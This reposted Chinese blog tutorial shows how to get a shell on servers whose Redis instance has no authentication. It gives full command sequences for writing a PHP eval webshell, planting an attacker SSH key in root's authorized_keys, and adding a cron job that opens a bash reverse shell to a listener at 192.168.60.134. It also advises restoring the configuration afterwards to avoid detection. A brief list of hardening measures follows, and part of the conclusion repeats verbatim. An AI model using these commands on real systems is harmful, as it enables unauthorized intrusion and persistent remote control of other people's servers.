0


记录一次Redis未授权getshell几种常见方法

记录一次Redis未授权getshell几种常见方法

一.redis未授权访问简介

Redis默认情况下,端口是6379,默认配置无密码

./redis-server 使用默认配置
./redis-server ../redis.conf 使用自定义配置

造成未授权访问原因:

1.未开启登录验证,并且把IP绑定到0.0.0.0
2.未开启登录验证,没有设置绑定IP,protected-mode关闭

二.Redis未授权写入webshell

利用条件

  1. 已知web的绝对路径
  2. 具有读写权限

利用过程

1.设置数据库备份目录为linux计划任务目录

config set dir /var/www/html

2.写入webshell并同步保存

set c "\n\n\n<?php @eval($_POST['rose']);?>\n\n\n" 

config set dbfilename webshell.php 

save 同步保存操作

3.Redis-Getshell工具利用方式

工具地址:https://github.com/pan3a/Redis-Getshell

使用命令:python RedisGetshell.py -H 127.0.0.1 -P 6379

在这里插入图片描述

选择1,输入目录配置,后续用默认配置
在这里插入图片描述在这里插入图片描述

看到webshell出现了,访问解析执行,拿工具连接就行了。

二.Redis未授权写入SSH-keygen

利用条件

  1. root账号启动redis服务
  2. 服务器开放SSH服务,允许密钥登录。

利用过程

1.kali上生成公私钥

ssh-keygen -t rsa

2.未授权访问redis

 redis-cli -h 192.168.60.130 

3.利用redis的数据备份功能修改备份目录为 /redis/.ssh/ 备份文件名为 authorized_keys

config set dir /root/.ssh 

config set dbfilename authorized_keys 

save  

4.写入key-value

set a "\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDiqG0Pp2TFXOKg/AdFZv2mdDKizbL85GrbGUg6ZoEpjWnoB9JGRSkSCfz/LoB0kokZ+iPMXPSETxn+Hs5Y13V9jQ0n+O5mDrO+eUSKhkKTTZBjjweIuoCjLvHcwuIHC1T3+S+U895Ur8Ea6tETRNPlKylgO9McsQjNg88q4RFo+vSXaU1IMs8kcyJ26wVeB8tAU/9nEKsjQkip52ENqSIqR3qdEQWV0Eoc9XrXT4o78TKQfkCSUTFUFgOO+9NYUfnWkR5KtbHusyRfNOKlkauFsgoIzHBQBl2K0pU4LkeA5D6YTHZwYwqId0AewSwCNzxq6GAbEVzmIJ3KzhOkjZXs3/JNmweX3DVdyPaXf57IogVyxkWtSGbA2QtUbWL96o8QT1TIvODA2H6s6ktq88/jTfOSInlhURzkxNYXLjvwRi/918ze0f7ISICGlbtkWR0audGfZwjLeYfjI5INc9mPBUjybSQDuCFI2oVOFFBbWWwdB4ipB8pyYf9JrsOMRO0= root@kali\n"

5.ssh连接

ssh -i id_rsa [email protected]

6.Redis-Getshell工具利用方式

在这里插入图片描述

正常要用Linux生成公钥的,放到Linux里面做的,这里只在Windows做个演示了,师傅们勿喷。

三.Redis未授权写计划任务反弹shell

因为/var/spool/cron/目录下存放的为以各个用户命名的计划任务文件,root用户可以修改任意用户的计划任务。dbfilename设置为root为用root用户权限执行计划任务。

执行命令反弹shell(写计划任务时会覆盖原来存在的用户计划任务).写文件之前先获取dir和dbfilename的值,以便恢复redis配置,将改动降到最低,避免被发现。

利用条件

  1. redis是root用户启动

利用过程

1.设置数据库备份目录为linux计划任务目录

 config set dir /var/spool/cron/ 

2.设置备份文件名为root,以root身份执行计划任务

 config set dbfilename root 

3.将反弹shell写入b键值并同步保存

set a "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.60.134/4444 0>&1\n\n" 
save 

等待一会儿就可以看到反弹的shell

4.Redis-Getshell工具利用方式

在这里插入图片描述

开启监听

nc -lvp 127.0.0.1:4444

输入地址,端口号,写入的目录(写入到Linux计划任务目录才行,这里随便找个目录做演示)可以看到出现root文件,成功生成计划任务,等会可以看到反弹shell了。

工具地址:https://github.com/pan3a/Redis-Getshell

防护

  1. 禁止一些高危命令
  2. 以低权限运行 Redis 服务
  3. 为 Redis 添加密码验证
  4. 禁止外网访问 Redis
  5. 修改默认端口
  6. 保证 authorized_keys 文件的安全
  7. 设置防火墙策略

总结

Windows下如何getshell?

​ 写入webshell,需要知道web路径
​ 写入启动项,需要目标服务器重启
​ 写入MOF,MOF每隔5秒钟会自动执行一次,适用于Windows2003。
实战在生产环境下用还是会有很多问题的

​ redis数据量稍微大一点,写shell到文件之后,php因为文件太大是会拒绝执行的
​ Ubuntu,Debian写计划任务反弹无用
​ 写/etc/passwd会覆盖原有/etc/passwd,不可能改了再改回来
​ 生产环境下用KEY * 这样的命令直接炸

参考

https://blog.csdn.net/weixin_46439278/article/details/118313113

为文件太大是会拒绝执行的
​ Ubuntu,Debian写计划任务反弹无用
​ 写/etc/passwd会覆盖原有/etc/passwd,不可能改了再改回来
​ 生产环境下用KEY * 这样的命令直接炸

参考

https://blog.csdn.net/weixin_46439278/article/details/118313113

https://www.bilibili.com/video/BV1Kt4y1e7qU?spm_id_from=333.1007.top_right_bar_window_history.content.click&vd_source=45daf1443a03fb3be2ec33daca40b56b


本文转载自: https://blog.csdn.net/qq_45888826/article/details/126906817
版权归原作者 Affectedfish 所有, 如有侵权,请联系我们删除。

“记录一次Redis未授权getshell几种常见方法”的评论:

还没有评论